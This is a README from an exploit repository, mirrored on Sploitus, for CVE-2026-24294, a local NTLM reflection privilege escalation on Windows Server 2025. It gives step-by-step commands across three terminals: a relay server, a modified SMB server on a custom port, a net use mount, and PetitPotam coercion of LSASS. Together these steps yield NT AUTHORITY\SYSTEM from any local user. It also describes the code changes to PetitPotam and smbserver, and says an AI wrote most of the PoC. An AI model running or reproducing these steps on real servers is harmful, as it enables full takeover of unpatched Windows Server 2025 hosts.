Share
## https://sploitus.com/exploit?id=5D433127-4AF0-535E-9314-BCF0E358A2CC
# CVE-2026-24294 - Local NTLM Reflection LPE via SMB Arbitrary Port

Local privilege escalation on Windows Server 2025 via NTLM reflection, abusing the SMB arbitrary port feature introduced in Windows 11 24H2 / Server 2025.

## Vulnerability

Windows 11 24H2 / Server 2025 introduced an SMB client feature that allows connections on arbitrary TCP ports (`net use \\host\share /tcpport:PORT`). Combined with SMB session multiplexing (MS-SMB2 Section 3.2.4.2), this enables local NTLM reflection β€” a low-privilege user can coerce a privileged service (LSASS) to authenticate to an attacker-controlled SMB server on a non-standard port, then relay the captured NTLM auth back to the real SMB service on port 445.

**Impact**: `NT AUTHORITY\SYSTEM` from any local user.

**Affected**: Windows Server 2025 (default config). Windows 11 24H2 enforces SMB signing, blocking the relay.

## Attack Flow

```
 LSASS (SYSTEM) ──NTLM──► SMB Client ──TCP:12345──► smbserver.py (ours)
                                                   β”‚
                                                   β–Ό relay NTLM blob
 SMB Service (:445) ◄────────────────── ntlmrelayx.py
 ← SYSTEM session
```

1. `net use` opens a TCP connection to our SMB server on a custom port
2. PetitPotam coerces LSASS to authenticate to `\\127.0.0.1\share`
3. The SMB client reuses the existing TCP connection (session multiplexing)
4. Our smbserver captures the privileged NTLM blob and relays it via ntlmrelayx
5. ntlmrelayx authenticates to the real SMB service on port 445 as SYSTEM

## Requirements

- Windows Server 2025 target
- Python 3 with [Impacket](https://github.com/fortra/impacket)
- PetitPotam.exe (build from source with Visual Studio, see PetitPotam/)

## Usage

Open 3 terminals.

**Terminal 1** β€” Start ntlmrelayx (listens on RAW port 6666, relays to localhost SMB):

```bash
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server --no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server -t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666
```

**Terminal 2** β€” Start modified smbserver (listens on port 12345, relays NTLM to port 6666):

```bash
python smbserver.py test . -port 12345 -smb2support -username user -password user -relay-port 6666
```

**Terminal 3** β€” Run the exploit:

```cmd
:: Mount share on custom port (opens persistent TCP connection)
net use \\127.0.0.1\test /tcpport:12345 /user:user user

:: Coerce LSASS to authenticate to our SMB server
PetitPotam.exe 127.0.0.1 localhost 2
```

The `whoami` output from ntlmrelayx will show `NT AUTHORITY\SYSTEM`.

## Components

- **`PetitPotam/`** β€” Modified PetitPotam source. Two changes from upstream:
  - UUID: `df1941c5-fe89-4e79-bf10-463657acf44d` (WS2025 EFSRPC interface)
  - Named pipe: `\pipe\efsrpc`
  - Uses API #2 (`EfsRpcEncryptFileSrv`), share name hardcoded as `test`
- **`smbserver.py`** β€” Modified impacket smbserver with `-relay-port` flag. Hooks SMB2 SESSION_SETUP to capture a second NTLM authentication on a multiplexed connection and relay it to a RAW relay server (ntlmrelayx `--raw-port`).

## Credits

This PoC was mostly written by AI (GLM 5.1) based on the research and techniques described in:

- [Bypassing Windows Authentication Reflection Mitigations for System Shells](https://www.synacktiv.com/en/publications/bypassing-windows-authentication-reflection-mitigations-for-system-shells-part-1) β€” Guillaume AndrΓ©, Synacktiv

## References

- [CVE-2026-24294](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24294) β€” Microsoft Security Response Center
- [PetitPotam](https://github.com/topotam/PetitPotam) β€” Gilles Lionel
- [Impacket](https://github.com/fortra/impacket) β€” Fortra